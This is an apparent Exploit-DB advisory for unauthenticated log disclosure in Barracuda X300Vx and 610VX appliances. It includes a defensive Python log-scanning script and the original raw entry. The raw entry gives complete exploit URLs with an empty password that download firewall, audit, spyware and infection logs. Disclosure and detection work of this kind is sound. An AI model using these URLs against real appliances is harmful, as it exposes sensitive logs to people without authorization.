Vendor: multiple Barracuda products
By: Juergen Grieshofer / 4CKnowLedge
CVSS: 8,8 (HIGH)
Type: Logfile Disclosure
CWE: 200
Product Name: multiple Barracuda products
Affected Version From: v6.1.4.008 (2014-02-18 08:06:34)
Affected Version To: v7.0.1.006 (2013-12-12 14:51:33)
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

multiple Barracuda products logfile disclosure

An unauthenticated user can download logfiles from multiple Barracuda products. The vulnerability affects the X300Vx with firmware v6.1.4.008 (2014-02-18 08:06:34) and the 610VX with firmware v7.0.1.006 (2013-12-12 14:51:33). On the X300Vx the logs are reachable at https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi; on the 610VX they are reachable at https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi, https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi and https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi.

Mitigation:

Update firmware to latest release
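
To check whether these endpoints were requested without credentials before the firmware update, the following added example (not part of the original advisory or of any Barracuda tooling) scans web access logs for the four CGI paths named above with an empty or missing password parameter. It assumes Common Log Format lines from a proxy in front of the appliance and that authenticated sessions carry a non-empty password value; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# CGI paths named in the advisory.
LOG_ENDPOINTS = {
    "/cgi-mod/logexport.cgi",
    "/cgi-mod/spyware_log_data.cgi",
    "/cgi-mod/audit_log_data.cgi",
    "/cgi-mod/infection_log_data.cgi",
}

# Assumption: Common Log Format lines from a proxy in front of the appliance.
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_unauthenticated_log_requests(lines):
    """Return (source, path, served) for credential-less log export requests."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not an access-log line we can parse
        url = urlsplit(m["target"])
        if url.path not in LOG_ENDPOINTS:
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        # As in the advisory's URLs, password= is empty; absent counts too.
        if any(params.get("password", [])):
            continue  # assumed to be an authenticated session
        # served=True: answered with 200, so the response needs follow-up.
        hits.append((m["src"], url.path, m["status"] == "200"))
    return hits

# Constructed sample lines (documentation address ranges, made-up values).
SAMPLE_LINES = [
    '192.0.2.10 - - [26/Mar/2014:10:00:00 +0000] "GET /cgi-mod/logexport.cgi?password=&et=&log_type=fw&user=admin HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/Aug/2014:10:00:00 +0000] "GET /cgi-mod/audit_log_data.cgi?auth_type=Local&et=&password=&user=admin HTTP/1.1" 403 0',
    '198.51.100.7 - - [03/Aug/2014:10:05:00 +0000] "GET /cgi-mod/logexport.cgi?password=CONSTRUCTEDVALUE&et=1&log_type=fw&user=admin HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Aug/2014:10:06:00 +0000] "GET /cgi-mod/other.cgi?password=&et= HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for src, path, served in find_unauthenticated_log_requests(SAMPLE_LINES):
        print(f"{src} {path} {'SERVED' if served else 'blocked'}")
```
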

Exploit-DB raw data:

# Exploit Title: multiple Barracuda products logfile disclosure
# Date: 03/26/2014
# Exploit Author: Juergen Grieshofer / 4CKnowLedge
# Author Homepage: https://4ck.eu/
# Vendor Homepage: https://barracudalabs.com

# Software Link: https://firewall.ptest.cudasvc.com/
# Firmware v6.1.4.008 (2014-02-18 08:06:34)
# Model: X300Vx
# BNSEC Nr: BNSEC-4189

-- Download logs without authentication --
$Logfiles
https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}
For further logfiles replace the values of [fw, access, http, network, vpn, svc]

Timeline:
        Vendor contacted: 03/26/2014
        Vendor generic ticket response: 03/28/2014
        Vendor response: 05/16/2014
        Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release


# Software Link: https://webfilter.ptest.cudasvc.com/
# Firmware v7.0.1.006 (2013-12-12 14:51:33)
# Model: 610VX
# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232

-- Download logs without authentication --
$Weblog
https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=

$Auditlog
https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=

$Infectionlog
https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=

Timeline:
        Vendor contacted: 04/01/2014
        Vendor response: 05/16/2014
        Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release